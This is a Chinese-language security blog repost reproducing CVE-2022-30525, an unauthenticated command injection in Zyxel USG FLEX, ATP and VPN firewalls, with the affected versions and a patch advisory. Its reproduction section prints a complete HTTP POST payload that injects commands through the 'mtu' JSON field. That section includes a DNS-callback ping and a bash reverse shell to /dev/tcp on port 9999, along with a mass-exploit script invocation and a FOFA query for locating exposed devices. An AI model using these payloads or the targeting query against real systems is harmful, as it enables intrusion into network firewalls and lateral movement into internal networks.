CVE-2022-30525漏洞复现

admin 2025年1月13日19:29:28评论4 views字数 1315阅读4分23秒阅读模式

Zyxel 防火墙

此文章仅供用于学习研究,严禁用于非法用途,否则后果自负。

CVE-2022-30525

漏洞简介

2022 年 5 月 12 日,Zyxel(合勤)发布安全公告,修复了其防火墙设备中未经身份验证的远程命令注入漏洞(CVE-2022-30525),该漏洞的CVSS评分为9.8。

该漏洞存在于某些Zyxel防火墙版本的 CGI 程序中,允许在未经身份验证的情况下在受影响设备上以nobody用户身份执行任意命令。

目前该漏洞的细节已经公开披露,且相应的Metasploit 模块已经发布,成功利用可以实现文件修改和操作系统命令执行,以获得对网络的初始访问权限并实现横向移动到内部系统。

漏洞影响

受影响的型号 受影响的固件版本 补丁版本
USG FLEX 100(W)、200、500、700 ZLD V5.00 -ZLD V5.21 Patch 1 ZLD V5.30
USG FLEX 50(W) / USG20(W)-VPN ZLD V5.10 - ZLD V5.21 Patch 1 ZLD V5.30
ATP系列 ZLD V5.10 - ZLD V5.21 Patch 1 ZLD V5.30
VPN系列 ZLD V4.60 - ZLD V5.21 Patch 1 ZLD V5.30

漏洞修复

目前Zyxel已经修复了此漏洞,受影响用户可以升级更新到ZLD V5.30。无法立即更新的用户,可以禁用对受影响产品的管理 Web 界面的 WAN 访问以缓解此漏洞。

漏洞复现

访问https://xx.xx.xx.xx/ztp/cgi-bin/handler,修改为post方式,加入payload

漏洞验证

 POST /ztp/cgi-bin/handler HTTP/1.1
 Host: ip
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
 Content-Type: application/json
 Connection: close
 Content-Length: 130
 
 {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged"
 :"1","vlanid":"5","mtu":"; ping ***.dnslog.cn;","data":"hi"}

反弹shell

 {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":";bash -c 'exec bash -i &>/dev/tcp/xxx.xxx.xxx.xxx/9999 <&1';","data":"hi"}

利用工具

github上有师傅已经写好的脚本:https://github.com/Henry4E36/CVE-2022-30525

 python CVE-2022-30525.py -f ip.txt

FOFA语法

 body="USG FLEX 100"

原文始发于微信公众号(漏洞挖掘之路):CVE-2022-30525漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月13日19:29:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2022-30525漏洞复现http://cn-sec.com/archives/1096240.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息